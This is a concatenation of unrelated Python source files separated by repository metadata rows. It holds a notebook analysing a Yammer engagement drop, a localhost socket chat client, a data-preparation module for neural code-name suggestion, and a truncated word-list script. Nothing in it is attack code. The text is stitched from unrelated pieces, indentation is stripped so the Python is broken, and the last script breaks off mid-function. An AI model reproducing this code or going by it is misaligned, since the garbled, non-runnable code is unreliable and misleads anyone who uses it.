# - I calculated 7-day rolling counts of each type of email event, and all email events together. Email events overall went up during the time period immediately before the drop in user engagement. All four types of email events increased during the same period, indicating higher clickthroughs on emails, higher numbers of email open events, and more reengagement and weekly digest emails sent. It could be that the higher number of weekly digests sent out mean that users don't have to visit the site directly as much.
# - Are users disengaging from the site due to too many emails/notifications?
# - I calculated a rolling 7-day count of emails sent to each user and found that the number of emails sent to each user per 7-day period has increased from 5.4 emails (July 20) to 7.75 emails (August 11). This suggests that an increasing volume of emails sent to individual users could have driven them away from using the site. To investigate this further I would want to look into email unsubscribe rates. If unsubscribe rates have also gone up, then it seems that Yammer is sending too many emails to its users.
# - To investigate whether the number of emails sent per user is correlated with the number of engaged users, I used a Granger causality test to see if "emails sent per user" could be used to predict "number of engaged users". With a high enough lag, the test statistics might be starting to become significant, but I would want to investigate these test results further before making any recommendations based on them.
# - Is the drop in engagement due to a decrease in new activated users? e.g. they are reaching the end of potential customer base?
# - I calculated the cumulative number of newly activated users over time, using the activation time for each user in the users table. I wanted to see if customer growth had leveled off. However, I saw that customer growth was still increasing in the same pattern. This was true when using creating date rather than activation date as well.
# What is my recommendation to Yammer?
# I have a few recommendations to Yammer:
# - Try decreasing the number of emails sent to each individual user to see if this increases engagement. They could try this for a subset of users first.
# - Investigate email unsubscribe rates to see if they are going up. This would indicate that increased email volume might be making users unhappy.
# - Compare this data to a wider time range to see if the drop shown here is seasonal.
# +
import matplotlib.pyplot as plt
import numpy as np
import os
import plotly.express as px
import pandas as pd
from scipy import stats
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import grangercausalitytests
# -
data_dir = '/Users/leslie/devel/insight-data-challenges/02-customer-cliff-dive/data'
benn_normal = pd.read_csv(os.path.join(data_dir, 'benn.normal_distribution - benn.normal_distribution.csv.tsv'), sep='\t')
rollup_periods = pd.read_csv(os.path.join(data_dir, 'dimension_rollup_periods - dimension_rollup_periods.csv.tsv'), sep='\t',
parse_dates=['time_id', 'pst_start', 'pst_end', 'utc_start', 'utc_end'])
yammer_emails = pd.read_csv(os.path.join(data_dir, 'yammer_emails - yammer_emails.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_events = pd.read_csv(os.path.join(data_dir, 'yammer_events - yammer_events.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_experiments = pd.read_csv(os.path.join(data_dir, 'yammer_experiments - yammer_experiments.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_users = pd.read_csv(os.path.join(data_dir, 'yammer_users - yammer_users.csv.tsv'), sep='\t',
parse_dates=['created_at', 'activated_at'])
# +
benn_normal.info()
benn_normal.head()
benn_normal.describe()
rollup_periods.info()
rollup_periods.head()
rollup_periods.describe()
yammer_emails.info()
yammer_emails.head()
yammer_emails.describe()
yammer_emails['action'].value_counts(dropna=False)
yammer_emails['user_type'].value_counts(dropna=False)
yammer_events.info()
yammer_events.head()
yammer_events.describe()
yammer_events['occurred_at']
yammer_events['event_type'].value_counts(dropna=False)
yammer_events['event_name'].value_counts(dropna=False)
yammer_events['location'].value_counts(dropna=False)
yammer_events['device'].value_counts(dropna=False)
yammer_events['user_type'].value_counts(dropna=False)
yammer_events['user_type'].dtype
# user_type should be an int, but has many missing values, and NaN is a float.
# So convert it to the Pandas Int64 dtype which can accommodate NaNs and ints.
yammer_events = yammer_events.astype({'user_type': 'Int64'})
yammer_experiments.info()
yammer_experiments.head()
yammer_experiments.describe()
yammer_experiments['experiment'].value_counts(dropna=False)
yammer_experiments['experiment_group'].value_counts(dropna=False)
yammer_experiments['location'].value_counts(dropna=False)
yammer_experiments['device'].value_counts(dropna=False)
yammer_users.info()
yammer_users.head()
yammer_users.describe()
yammer_users['language'].value_counts(dropna=False)
yammer_users['state'].value_counts(dropna=False)
yammer_users['company_id'].value_counts(dropna=False)
# -
# ## Initial data investigation
# +
# How many days in the dataset?
yammer_events['occurred_at'].max() - yammer_events['occurred_at'].min()
# 122 days!
rollup_periods['pst_start'].max() - rollup_periods['pst_end'].min()
# 1094 days - way more intervals than needed to tile this events data!
yammer_events = yammer_events.sort_values(by='occurred_at', ascending=True)
small_events = yammer_events.head(int(yammer_events.shape[0]/10)).sample(n=40)
small_events = small_events.sort_values(by='occurred_at', ascending=True)
small_events['occurred_at'].max() - small_events['occurred_at'].min()
weekly_rollup_periods = rollup_periods.loc[rollup_periods['period_id'] == 1007]
# -
# +
small_rolling_engagement = small_events.loc[small_events['event_type'] == 'engagement'].rolling(
'7D', on='occurred_at').count()
# I'm not sure whether rollup_periods are closed on right, left, or both...
# Calculate counts of engagement events in a 7-day rolling window
rolling_engagement_counts = yammer_events.loc[yammer_events['event_type'] == 'engagement'].sort_values(
by='occurred_at', ascending=True # Have to sort by "on" column to use rolling()
).rolling('7D', on='occurred_at', min_periods=1).count()
# +
# Use a loop to aggregate on rollup periods
yammer_events['event_name'].unique()
event_range = [min(yammer_events['occurred_at']), max(yammer_events['occurred_at'])]
covered_weekly_rollup_periods = weekly_rollup_periods.loc[(weekly_rollup_periods['pst_end'] <= event_range[1])
& (weekly_rollup_periods['pst_start'] >= event_range[0])]
# in interval --> start < occurred_at <= end
counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_events.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])
& (yammer_events['event_type'] == 'engagement')]
# Count user engagement events
cbt = df.groupby('event_name').aggregate(event_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['engaged_users'] = df['user_id'].nunique()
cbt['engagement_event_count'] = df.shape[0]
if counts_by_type is None:
counts_by_type = cbt
else:
counts_by_type = counts_by_type.append(cbt)
counts_by_type
# +
# Plot engaged users over time
fig = px.scatter(counts_by_type, x='pst_end', y='engaged_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of engagement_events over time
fig = px.scatter(counts_by_type, x='pst_end', y='engagement_event_count', template='plotly_white')
fig.show()
# Plot count of individual event types over time
counts_melted = counts_by_type.melt(id_vars=['pst_start', 'pst_end', 'engaged_users', 'engagement_event_count'])
fig = px.scatter(counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='event_name', facet_col_wrap=3, height=1200)
fig.update_yaxes(matches=None)
fig.show()
# -
# Are there any "experiments" messing things up?
yammer_experiments['occurred_at'].describe()
# No, these are all before the issue shows up
# +
# Investigate the sending of emails to user in the same rollup periods
email_counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
# Get egagement events within the period
df = yammer_emails.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])]
# Count user engagement events
cbt = df.groupby('action').aggregate(action_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['emailed_users'] = df['user_id'].nunique()
cbt['email_event_count'] = df.shape[0]
cbt['emails_sent_per_user'] = df.loc[df['action'].str.startswith('sent_')].groupby(
'user_id').count().mean()['user_type']
if email_counts_by_type is None:
email_counts_by_type = cbt
else:
email_counts_by_type = email_counts_by_type.append(cbt)
email_counts_by_type
# +
# Plot emailed users over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='emailed_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of email events over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='email_event_count', template='plotly_white')
fig.show()
# Plot count of individual email types over time
email_counts_melted = email_counts_by_type.melt(id_vars=[
'pst_start', 'pst_end', 'emailed_users', 'email_event_count', 'emails_sent_per_user'])
fig = px.scatter(email_counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='action', facet_col_wrap=2)
fig.update_yaxes(matches=None)
fig.show()
# -
# +
# What is email engagement event count per user? Did that increase?
# +
fig = px.scatter(email_counts_by_type, x='pst_start', y='emails_sent_per_user', template='plotly_white')
fig.show()
p, r = stats.pearsonr(email_counts_by_type['emails_sent_per_user'].to_numpy(),
counts_by_type['engaged_users'].to_numpy())
# They do look moderately correlated, but how do I test that one has an effect on the other?
# -
acf_50 = acf(counts_by_type['engaged_users'], nlags=50, fft=True)
pacf_50 = pacf(counts_by_type['engaged_users'], nlags=50)
fig, axes = plt.subplots(1, 2, figsize=(16, 3), dpi=200)
plot_acf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[0])
plot_pacf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[1])
plt.show()
test_df = pd.DataFrame({'emails_sent_per_user': email_counts_by_type['emails_sent_per_user'].to_numpy(),
'engaged_users': counts_by_type['engaged_users'].to_numpy()})
lags = range(20)
caus_test = grangercausalitytests(test_df, maxlag=lags)
# Has there been a dropoff in new users?
# +
yammer_users = yammer_users.sort_values(by='created_at', ascending=True)
yammer_users['cumulative_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_users', template='plotly_white')
fig.show()
# Nope, growth is still practicially exponenital
yammer_users['cumulative_activated_users'] = pd.Series(np.ones(yammer_users.shape[0]).cumsum())
fig = px.scatter(yammer_users, x='created_at', y='cumulative_activated_users', template='plotly_white')
fig.show()
yammer_users['company_id'].nunique()
# -
| 51.963235 | 524 | 0.743809 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,119 | 0.57443 |
a82ba74fc6af916b17675886faaf3aad6278c7c2 | 796 | py | Python | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 4 | 2020-09-03T15:41:42.000Z | 2021-12-24T15:28:20.000Z | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 48 | 2020-09-13T20:22:42.000Z | 2021-04-30T11:13:30.000Z | students/K33402/laboratory_works/Ermakova_Anna/laboratory_work_1/task_4/client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
]
| 69 | 2020-09-06T10:32:37.000Z | 2021-11-28T18:13:17.000Z | import socket
import threading
import random
def send_message():
try:
while True:
msg = input()
sock.send(bytes(name + ": " + msg, 'utf-8'))
if msg == '\leave chat':
sock.close()
break
except Exception:
pass
finally:
print('You left chat.')
def receive_message():
try:
while True:
data = sock.recv(1024).decode('utf-8')
if not data:
break
print(data)
sock.close()
except Exception:
pass
sock = socket.socket()
sock.connect(('localhost', 9090))
number = random.randint(0,1000)
name = "person" + str(number)
threading.Thread(target=send_message).start()
threading.Thread(target=receive_message).start()
| 20.410256 | 56 | 0.548995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 66 | 0.082915 |
a82c200cd117a48cc9a2ebacd146f50b56baabcf | 23,587 | py | Python | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 128 | 2016-05-10T01:38:27.000Z | 2022-02-04T07:14:12.000Z | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 6 | 2016-07-19T09:27:47.000Z | 2021-07-08T21:22:32.000Z | convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | [
"BSD-3-Clause"
]
| 36 | 2016-05-11T08:57:26.000Z | 2021-07-07T02:37:07.000Z | from collections import defaultdict
import heapq
from itertools import chain, repeat
from feature_dict import FeatureDictionary
import json
import numpy as np
import scipy.sparse as sp
class TokenCodeNamingData:
SUBTOKEN_START = "%START%"
SUBTOKEN_END = "%END%"
NONE = "%NONE%"
@staticmethod
def __get_file_data(input_file):
with open(input_file, 'r') as f:
data = json.load(f)
# data=[{"tokens":"hello world I am OK".split(),"name":"hello world you".split()}]*4
# data+=[{"tokens":"just another test of a silly program".split(),"name":"who knows".split()}]*4
names = []
original_names = []
code = []
for entry in data:
# skip entries with no relevant data (this will crash the code)
if len(entry["tokens"]) == 0 or len(entry["name"]) == 0:
continue
code.append(TokenCodeNamingData.remove_identifiers_markers(entry["tokens"]))
original_names.append(",".join(entry["name"]))
subtokens = entry["name"]
names.append([TokenCodeNamingData.SUBTOKEN_START] + subtokens + [TokenCodeNamingData.SUBTOKEN_END])
return names, code, original_names
def __init__(self, names, code):
self.name_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(names), 2)
self.name_dictionary.add_or_get_id(self.NONE)
self.all_tokens_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(
[chain.from_iterable(code), chain.from_iterable(names)]), 5)
self.all_tokens_dictionary.add_or_get_id(self.NONE)
self.name_empirical_dist = self.__get_empirical_distribution(self.all_tokens_dictionary, chain.from_iterable(names))
@staticmethod
def __get_empirical_distribution(element_dict, elements, dirichlet_alpha=10.):
"""
Retrive te empirical distribution of tokens
:param element_dict: a dictionary that can convert the elements to their respective ids.
:param elements: an iterable of all the elements
:return:
"""
targets = np.array([element_dict.get_id_or_unk(t) for t in elements])
empirical_distribution = np.bincount(targets, minlength=len(element_dict)).astype(float)
empirical_distribution += dirichlet_alpha / len(empirical_distribution)
return empirical_distribution / (np.sum(empirical_distribution) + dirichlet_alpha)
def __get_in_lbl_format(self, data, dictionary, cx_size):
targets = []
contexts = []
ids = []
for i, sequence in enumerate(data):
for j in xrange(1, len(sequence)): # First element should always be predictable (ie sentence start)
ids.append(i)
targets.append(dictionary.get_id_or_unk(sequence[j]))
context = sequence[:j]
if len(context) < cx_size:
context = [self.NONE] * (cx_size - len(context)) + context
else:
context = context[-cx_size:]
assert len(context) == cx_size, (len(context), cx_size,)
contexts.append([dictionary.get_id_or_unk(t) for t in context])
return np.array(targets, dtype=np.int32), np.array(contexts, dtype=np.int32), np.array(ids, np.int32)
def get_data_in_lbl_format(self, input_file, code_cx_size, names_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_in_lbl_format(names, self.name_dictionary, names_cx_size), \
self.__get_in_lbl_format(code, self.all_tokens_dictionary, code_cx_size), original_names
@staticmethod
def get_data_in_lbl_format_with_validation(input_file, code_cx_size, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_in_lbl_format(names[:lim], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[:lim], naming.all_tokens_dictionary, code_cx_size), original_names[:lim], \
naming.__get_in_lbl_format(names[lim:], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[lim:], naming.all_tokens_dictionary, code_cx_size), original_names[lim:], naming
@staticmethod
def get_data_in_forward_format_with_validation(input_file, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_data_in_forward_format(names[:lim], code[:lim], names_cx_size),\
naming.__get_data_in_forward_format(names[lim:], code[lim:], names_cx_size), naming
def get_data_in_forward_format(self, input_file, name_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_data_in_forward_format(names, code, name_cx_size), original_names
def __get_data_in_forward_format(self, names, code, name_cx_size):
"""
Get the data in a "forward" model format.
:param data:
:param name_cx_size:
:return:
"""
assert len(names) == len(code), (len(names), len(code), code.shape)
# Keep only identifiers in code
#code = self.keep_identifiers_only(code)
name_targets = []
name_contexts = []
original_names_ids = []
id_xs = []
id_ys = []
k = 0
for i, name in enumerate(names):
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.name_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
for code_token in set(code[i]):
token_id = self.all_tokens_dictionary.get_id_or_none(code_token)
if token_id is not None:
id_xs.append(k)
id_ys.append(token_id)
k += 1
code_features = sp.csr_matrix((np.ones(len(id_xs)), (id_xs, id_ys)), shape=(k, len(self.all_tokens_dictionary)), dtype=np.int32)
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_features, original_names_ids
@staticmethod
def keep_identifiers_only(self, code):
filtered_code = []
for tokens in code:
identifier_tokens = []
in_id = False
for t in tokens:
if t == "<id>":
in_id = True
elif t == '</id>':
in_id = False
elif in_id:
identifier_tokens.append(t)
filtered_code.append(identifier_tokens)
return filtered_code
@staticmethod
def remove_identifiers_markers(code):
return filter(lambda t: t != "<id>" and t != "</id>", code)
def get_data_in_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_copy_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_copy_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_recurrent_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_convolution(names, code, min_code_size), original_names
def get_data_in_recurrent_copy_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_copy_convolution(names, code, min_code_size), original_names
def get_data_for_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_sentences, original_names_ids
def get_data_for_recurrent_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
return name_targets, code_sentences
def get_data_for_recurrent_copy_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
target_is_unk = []
copy_vectors = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
unk_tokens = [self.all_tokens_dictionary.is_unk(t) for t in name]
target_can_be_copied = [[t == subtok for t in code[i]] for subtok in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
target_is_unk.append(np.array(unk_tokens, dtype=np.int32))
copy_vectors.append(np.array(target_can_be_copied, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
code = np.array(code, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.object)
copy_vectors = np.array(copy_vectors, dtype=np.object)
return name_targets, code_sentences, code, target_is_unk, copy_vectors
@staticmethod
def get_data_in_recurrent_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_recurrent_copy_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
@staticmethod
def get_data_in_copy_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
def get_data_for_copy_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
original_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
original_code = []
copy_vector = []
target_is_unk = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_targets.append(name[j])
target_is_unk.append(self.all_tokens_dictionary.is_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
original_code.append(code[i])
tokens_to_be_copied = [t == name[j] for t in code[i]]
copy_vector.append(np.array(tokens_to_be_copied, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
copy_vector = np.array(copy_vector, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.int32)
return name_targets, original_targets, name_contexts, code_sentences, original_code, copy_vector, target_is_unk, original_names_ids
def get_suggestions_given_name_prefix(self, next_name_log_probs, name_cx_size, max_predicted_identifier_size=5, max_steps=100):
suggestions = defaultdict(lambda: float('-inf')) # A list of tuple of full suggestions (token, prob)
# A stack of partial suggestion in the form ([subword1, subword2, ...], logprob)
possible_suggestions_stack = [
([self.NONE] * (name_cx_size - 1) + [self.SUBTOKEN_START], [], 0)]
# Keep the max_size_to_keep suggestion scores (sorted in the heap). Prune further exploration if something has already
# lower score
predictions_probs_heap = [float('-inf')]
max_size_to_keep = 15
nsteps = 0
while True:
scored_list = []
while len(possible_suggestions_stack) > 0:
subword_tokens = possible_suggestions_stack.pop()
# If we're done, append to full suggestions
if subword_tokens[0][-1] == self.SUBTOKEN_END:
final_prediction = tuple(subword_tokens[1][:-1])
if len(final_prediction) == 0:
continue
log_prob_of_suggestion = np.logaddexp(suggestions[final_prediction], subword_tokens[2])
if log_prob_of_suggestion > predictions_probs_heap[0] and not log_prob_of_suggestion == float('-inf'):
# Push only if the score is better than the current minimum and > 0 and remove extraneous entries
suggestions[final_prediction] = log_prob_of_suggestion
heapq.heappush(predictions_probs_heap, log_prob_of_suggestion)
if len(predictions_probs_heap) > max_size_to_keep:
heapq.heappop(predictions_probs_heap)
continue
elif len(subword_tokens[1]) > max_predicted_identifier_size: # Stop recursion here
continue
# Convert subword context
context = [self.name_dictionary.get_id_or_unk(k) for k in
subword_tokens[0][-name_cx_size:]]
assert len(context) == name_cx_size
context = np.array([context], dtype=np.int32)
# Predict next subwords
target_subword_logprobs = next_name_log_probs(context)
def get_possible_options(name_id):
# TODO: Handle UNK differently?
subword_name = self.all_tokens_dictionary.get_name_for_id(name_id)
if subword_name == self.all_tokens_dictionary.get_unk():
subword_name = "***"
name = subword_tokens[1] + [subword_name]
return subword_tokens[0][1:] + [subword_name], name, target_subword_logprobs[0, name_id] + \
subword_tokens[2]
top_indices = np.argsort(-target_subword_logprobs[0])
possible_options = [get_possible_options(top_indices[i]) for i in xrange(max_size_to_keep)]
# Disallow suggestions that contain duplicated subtokens.
scored_list.extend(filter(lambda x: len(x[1])==1 or x[1][-1] != x[1][-2], possible_options))
# Prune
scored_list = filter(lambda suggestion: suggestion[2] >= predictions_probs_heap[0] and suggestion[2] >= float('-inf'), scored_list)
scored_list.sort(key=lambda entry: entry[2], reverse=True)
# Update
possible_suggestions_stack = scored_list[:max_size_to_keep]
nsteps += 1
if nsteps >= max_steps:
break
# Sort and append to predictions
suggestions = [(identifier, np.exp(logprob)) for identifier, logprob in suggestions.items()]
suggestions.sort(key=lambda entry: entry[1], reverse=True)
# print suggestions
return suggestions
| 51.953744 | 143 | 0.644338 | 23,399 | 0.99203 | 0 | 0 | 7,055 | 0.299105 | 0 | 0 | 1,684 | 0.071395 |
a82c44a1683f511d5f99fbda3a6f12bd84f86c4c | 550 | py | Python | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| null | null | null | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| 1 | 2021-02-27T06:12:07.000Z | 2021-03-01T14:32:39.000Z | test_word.py | AsherSeiling/Ap-hug-Vocab-database | fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a | [
"MIT"
]
| 1 | 2021-02-27T06:14:55.000Z | 2021-02-27T06:14:55.000Z | words = open("words.txt", "r")
words = [x.rstrip("\n") for x in words.readlines()]
refwords = open("referencewords.txt", "r")
refwords = [x.strip("\n") for x in refwords.readlines()]
def find_word(word):
retunrval = False
if word.lower() in words:
retunrval = True
return retunrval
words_needed = []
def main():
for items in refwords:
buffer = ""
for i in items:
if i != " ":
buffer += i
